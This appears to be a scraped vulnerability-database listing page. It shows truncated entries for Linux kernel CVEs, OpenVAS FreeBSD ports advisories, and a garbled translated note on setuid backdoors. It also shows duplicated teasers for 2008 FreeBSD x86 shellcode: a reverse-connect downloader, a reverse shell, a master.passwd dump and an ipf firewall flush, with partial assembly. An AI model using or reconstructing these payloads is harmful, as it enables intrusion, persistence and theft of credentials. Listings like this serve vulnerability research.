PT-2008-5180 · Linux +1 · Linux Kernel +1

Name of the Vulnerable Software and Affected Versions: Linux kernel versions prior to 2.6.19 Description: The issue allows local users to gain the privileges of a different group, and obtain sensitive information or possibly have unspecified other impact, by splicing into an inode in order to...

CVE-2008-4210

fs/open.c in the Linux kernel before 2.6.22 does not properly strip setuid and setgid bits when there is a write to a file, which allows local users to gain the privileges of a different group, and obtain sensitive information or possibly have unspecified other impact, by creating an executable...

CVE-2008-4210

fs/open.c in the Linux kernel before 2.6.22 does not properly strip setuid and setgid bits when there is a write to a file, which allows local users to gain the privileges of a different group, and obtain sensitive information or possibly have unspecified other impact, by creating an executable...

under linux to stay Local the back door of the two methods-vulnerability warning-the black bar safety net

Method one: setuid method, in fact, 8 is very secluded. Look at the process: root@localdomain lib ls-l |grep ld-linux lrwxrwxrwx 1 root root 9 2008-06-07 1 7:3 2 ld-linux. so. 2 - ld-2.7. so lrwxrwxrwx 1 root root 1 3 2008-06-07 1 7:4 7 ld-lsb. so. 3 - ld-linux. so. 2 root@localdomain lib chmod +...

freebsd/x86 rev connect, recv, jmp, return results 90 bytes

No description provided by source. / ; sm4x - 2008 ; reverse connect dlshellcode and execute, exit ; - i've used this to feed pwnd progs huge messy shellcode ret'ing the results over nc ; ; - feed it with a $nc -vvl -p8000 shellcodeinfile ; setuid0; socket; connect; dups; recv; jmp; exit; ; 90...

freebsd/x86 rev connect, recv, jmp, return results 90 bytes

Exploit for freebsd/x86 platform in category shellcode =========================================================== freebsd/x86 rev connect, recv, jmp, return results 90 bytes =========================================================== / ; sm4x - 2008 ; reverse connect dlshellcode and execute, exi...

freebsd/x86 rev connect, recv, jmp, return results 90 bytes

freebsd/x86 rev connect, recv, jmp, return results 90 bytes. Shellcode exploit for freebsdx86 platform / ; sm4x - 2008 ; reverse connect dlshellcode and execute, exit ; - i've used this to feed pwnd progs huge messy shellcode ret'ing the results over nc ; ; - feed it with a $nc -vvl -p8000 pls ex...

freebsd/x86 rev connect recv jmp return results 90 bytes

No description provided by source. / ; sm4x - 2008 ; reverse connect dlshellcode and execute, exit ; - i've used this to feed pwnd progs huge messy shellcode ret'ing the results over nc ; ; - feed it with a $nc -vvl -p8000 shellcodeinfile ; setuid0; socket; connect; dups; recv; jmp; exit; ; 90...

FreeBSD Ports: bmon

The remote host is missing an update to the system as announced in the referenced advisory. SPDX-FileCopyrightText: 2008 E-Soft Inc. Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only...

FreeBSD Ports: ko-helvis

The remote host is missing an update to the system as announced in the referenced advisory. VID 0cf3480d-5fdf-11d9-b721-00065be4b5b6 OpenVAS Vulnerability Test $ Description: Auto generated from vuxml or freebsd advisories Authors: Thomas Reinke Copyright: Copyright c 2008 E-Soft Inc...

FreeBSD Ports: ja-uim

The remote host is missing an update to the system as announced in the referenced advisory. VID fb03b1c6-8a8a-11d9-81f7-02023f003c9f OpenVAS Vulnerability Test $ Description: Auto generated from vuxml or freebsd advisories Authors: Thomas Reinke Copyright: Copyright c 2008 E-Soft Inc...

FreeBSD Ports: cdrdao

The remote host is missing an update to the system as announced in the referenced advisory. VID d51a7e6e-c546-11d9-9aed-000e0c2e438a OpenVAS Vulnerability Test $ Description: Auto generated from vuxml or freebsd advisories Authors: Thomas Reinke Copyright: Copyright c 2008 E-Soft Inc...

FreeBSD Ports: ifmail

The remote host is missing an update to the system as announced in the referenced advisory. SPDX-FileCopyrightText: 2008 E-Soft Inc. Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only...

FreeBSD Ports: cdrdao

The remote host is missing an update to the system as announced in the referenced advisory. SPDX-FileCopyrightText: 2008 E-Soft Inc. Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only...

freebsd/x86 /bin/cat /etc/master.passwd (NULL free) 65 bytes

No description provided by source. ; sm4x 2008 ; /bin/cat /etc/master.passwd ; 65 bytes ; FreeBSD 7.0-RELEASE global start start: xor eax, eax ; --- setuid0 push eax push eax mov al, 0x17 int 0x80 ; --- setup /etc/master.passwd jmp short loadfile ok: pop esi ; setup /bin/cat push eax push...

freebsd/x86 setuid(0); execve(ipf -Fa); shellcode 56 bytes

No description provided by source. ; sm4x - 2008 ; setuid0; execve"//sbin/ipf", "//sbin/ipf", "-Faa", 0, 0; ; 56 bytes ; FreeBSD 7.0-RELEASE global start start: main: ; --------------------- setuid 0 xor eax, eax xor ecx, ecx push eax ;0 mov al, 0x17 int 0x80 ; --------------------- -Faa xor eax,...

freebsd/x86 reverse portbind /bin/sh 89 bytes

No description provided by source. ; sm4x - 2008 ; reverse portbind /bin/sh ; NULL free if address is. ; setuid0; socket; connect; exit; ; 89 bytes ; FreeBSD 7.0-RELEASE global start start: xor eax, eax ; --- setuid0 push eax push eax mov al, 0x17 push eax int 0x80 ; --- socket push eax push byte...

freebsd/x86 setuid(0); execve(ipf -Fa); shellcode 57 bytes

Exploit for freebsd/x86 platform in category shellcode ========================================================== freebsd/x86 setuid0; execveipf -Fa; shellcode 57 bytes ========================================================== ; sm4x - 2008 ; setuid0; execve"//sbin/ipf", "//sbin/ipf", "-Faa", 0,...

freebsd/x86 - reverse portbind /bin/sh 89 bytes

freebsd/x86 reverse portbind /bin/sh 89 bytes. Shellcode exploit for freebsdx86 platform ; sm4x - 2008 ; reverse portbind /bin/sh ; NULL free if address is. ; setuid0; socket; connect; exit; ; 89 bytes ; FreeBSD 7.0-RELEASE global start start: xor eax, eax ; --- setuid0 push eax push eax mov al,...

freebsd/x86 - setuid0; execveipf -Fa; shellcode 57 bytes

freebsd/x86 setuid0; execveipf -Fa; shellcode 57 bytes. Shellcode exploit for freebsdx86 platform ; sm4x - 2008 ; setuid0; execve"//sbin/ipf", "//sbin/ipf", "-Faa", 0, 0; ; 57 bytes ; FreeBSD 7.0-RELEASE global start start: main: ; --------------------- setuid 0 xor eax, eax xor ecx, ecx push eax...